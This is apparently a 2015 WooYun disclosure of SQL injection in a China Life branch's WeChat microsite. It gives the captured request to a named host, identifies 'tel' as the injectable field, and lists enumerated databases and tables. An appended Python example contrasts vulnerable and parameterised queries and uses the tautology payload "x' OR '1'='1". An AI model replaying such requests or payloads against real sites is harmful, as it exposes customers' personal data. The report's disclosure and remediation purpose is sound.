
Vulnerability Summary

Defect ID: wooyun-2015-0145390

Title: Insurance security: SQL injection at a China Life branch company can leak large numbers of user names, addresses, mobile numbers, etc.

Vendor: China Life

Author: Martial

Submitted: 2015-10-09 14:27

Fixed: 2015-11-24 08:40

Published: 2015-11-24 08:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-10-09: Details sent to the vendor, awaiting the vendor's handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and experts in the relevant field
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public

Brief description:

A teammate who drags you down.

Detailed description:

WeChat side: China Life P&C Insurance, Tangshan central sub-branch

(screenshot: 3.jpg)


Open the micro-site and capture a request:

POST /weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY HTTP/1.1
Host: www.winadd.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://www.winadd.cn
Content-Length: 94
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CN
Referer: http://www.winadd.cn/weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY
Cookie: PHPSESSID=90b06811abbe786a7065f3fe860f90c7
wechaname=&tel=13012345678&truename=%E7%8E%8B%E5%B8%85&qq=&sex=1&birthday=2002033&action=index


The injectable parameter is tel.
There are a lot of databases:

available databases [9]:
[*] boyacms
[*] byhh-weixin
[*] byhh-weixinnew
[*] byhh_weixin_demo
[*] information_schema
[*] iwebmall
[*] mysql
[*] weixin
[*] x25gbk


Take a look at the tables in the current database:

Database: byhh-weixin
[138 tables]
+--------------------------+
| wx_access |
| wx_access_token |
| wx_activity |
| wx_address |
| wx_address_danyuan |
| wx_address_loupan |
| wx_adma |
| wx_alipay_config |
| wx_api |
| wx_areply |
| wx_article |
| wx_autumns_box |
| wx_autumns_ip |
| wx_autumns_open |
| wx_canyin_yaoqing |
| wx_canyin_yaoqing_cart |
| wx_case |
| wx_catemenu |
| wx_cehua |
| wx_classify |
| wx_company |
| wx_diymen_class |
| wx_diymen_set |
| wx_dream |
| wx_feyin |
| wx_feyin_record |
| wx_flash |
| wx_function |
| wx_games |
| wx_games_record |
| wx_home |
| wx_hongbao |
| wx_hongbao_exchange |
| wx_hongbao_log |
| wx_hongbao_prize |
| wx_hongbao_reward |
| wx_hongbao_zhuli_log |
| wx_host |
| wx_host_list_add |
| wx_host_order |
| wx_hots |
| wx_hotspinglun |
| wx_hotuser |
| wx_img |
| wx_indent |
| wx_jingpai |
| wx_jingpai_record |
| wx_jsapi_ticket |
| wx_kaiyedl |
| wx_keyword |
| wx_leitai_expense |
| wx_lightapp |
| wx_lightapp_detail |
| wx_links |
| wx_liuyan |
| wx_lottery |
| wx_lottery_bound |
| wx_lottery_record |
| wx_marrycard |
| wx_marrycard_wish |
| wx_member |
| wx_member_card_contact |
| wx_member_card_coupon |
| wx_member_card_create |
| wx_member_card_exchange |
| wx_member_card_info |
| wx_member_card_integral |
| wx_member_card_set |
| wx_member_card_sign |
| wx_member_card_vip |
| wx_membercard |
| wx_membercard_duihuan |
| wx_membercard_record |
| wx_membercard_user |
| wx_menuplus |
| wx_nearby_user |
| wx_node |
| wx_open_tab |
| wx_order |
| wx_ordering_class |
| wx_ordering_set |
| wx_other |
| wx_panorama |
| wx_photo |
| wx_photo_list |
| wx_product |
| wx_product_cart |
| wx_product_cart_list |
| wx_product_cat |
| wx_product_diningtable |
| wx_qixi_question |
| wx_qixi_shop_question |
| wx_qixi_userinfo |
| wx_qixi_userinfo_lottery |
| wx_recognition |
| wx_recognition_record |
| wx_red_packet |
| wx_red_packet_exchange |
| wx_red_packet_log |
| wx_red_packet_prize |
| wx_red_packet_reward |
| wx_rekeyword |
| wx_reply_info |
| wx_requestdata |
| wx_role |
| wx_role_user |
| wx_selfform |
| wx_selfform_input |
| wx_selfform_value |
| wx_site |
| wx_site_plugmenu |
| wx_snccode |
| wx_system_info |
| wx_table_record |
| wx_taobao |
| wx_team |
| wx_team_tags |
| wx_text |
| wx_token_open |
| wx_token_open_div |
| wx_user |
| wx_user_group |
| wx_user_request |
| wx_userinfo |
| wx_users |
| wx_voiceresponse |
| wx_weather |
| wx_wecha_user |
| wx_wecha_userinfo |
| wx_wechat_group |
| wx_wechat_group_list |
| wx_wifi_relation |
| wx_wifi_token |
| wx_world_cup_date |
| wx_world_cup_lottery |
| wx_world_cup_name |
| wx_world_cup_record |
| wx_wxuser |
+--------------------------+


Information involved:

(screenshot: 1.jpg)


Dumping a few rows to have a look:

(screenshot: 2.jpg)

Proof of vulnerability:

(screenshot: 1.jpg)

Fix recommendation:

Filter the input, or get a different teammate.

Copyright notice: when reposting, please credit Martial@WooYun
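The report's fix recommendation ("filter the input") and its finding that the `tel` form field is injectable are illustrated below with an added example that is not code from the report or from the site in question (the site runs PHP; the original application code is not on the page, so this Python/SQLite model is a hypothetical reconstruction of the pattern). It places the vulnerable string-spliced query next to two hardened versions: a parameterised query alone, and a parameterised query behind an allow-list check on the phone number. All sample rows, the table name and the mobile-number format are constructed assumptions.

```python
"""Added example, not from the original report or the site's code: a 'tel'
lookup built by string splicing beside its hardened forms, run against an
in-memory SQLite table constructed here."""
import re
import sqlite3

# Constructed sample data; nothing here comes from the real database.
SAMPLE_USERS = [
    ("13012345678", "User A", "Tangshan, Road A"),
    ("13987654321", "User B", "Tangshan, Road B"),
    ("15011112222", "User C", "Beijing, Road C"),
]


def make_db():
    """Create the assumed wx_userinfo table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wx_userinfo (tel TEXT, truename TEXT, address TEXT)")
    conn.executemany("INSERT INTO wx_userinfo VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, tel):
    """The flaw: the request value becomes part of the SQL text, so it can
    rewrite the WHERE clause instead of being compared as a phone number."""
    sql = "SELECT tel, truename, address FROM wx_userinfo WHERE tel = '%s'" % tel
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, tel):
    """Fix layer 1: a bound parameter is sent as data, never parsed as SQL."""
    sql = "SELECT tel, truename, address FROM wx_userinfo WHERE tel = ?"
    return conn.execute(sql, (tel,)).fetchall()


# Assumption: an 11-digit mainland China mobile number starting with 1.
TEL_RE = re.compile(r"1\d{10}")


def validate_tel(tel):
    """Fix layer 2: allow-list the value's shape before it reaches the query."""
    if not TEL_RE.fullmatch(tel):
        raise ValueError("tel must be an 11-digit mobile number")
    return tel


def lookup_hardened(conn, tel):
    """Both layers together: validate, then bind."""
    return lookup_parameterized(conn, validate_tel(tel))


def demo():
    """Run each variant on a normal value and on a constructed tautology
    input (the textbook illustration of the flaw) and return row counts."""
    conn = make_db()
    normal = "13012345678"
    tautology = "x' OR '1'='1"
    results = {
        "vulnerable_normal": len(lookup_vulnerable(conn, normal)),
        # WHERE tel = 'x' OR '1'='1' matches every row: the data leak.
        "vulnerable_tautology": len(lookup_vulnerable(conn, tautology)),
        "parameterized_normal": len(lookup_parameterized(conn, normal)),
        # The same string, bound as data, matches nothing.
        "parameterized_tautology": len(lookup_parameterized(conn, tautology)),
        "hardened_normal": len(lookup_hardened(conn, normal)),
    }
    try:
        lookup_hardened(conn, tautology)
        results["hardened_tautology"] = "accepted"
    except ValueError:
        results["hardened_tautology"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The parameterised query alone already closes the injection; the allow-list check is the cheap extra that also keeps junk out of the table and gives a clean point at which to log rejected requests.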


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-10 08:39

Vendor reply:

Thanks.

Latest status:

None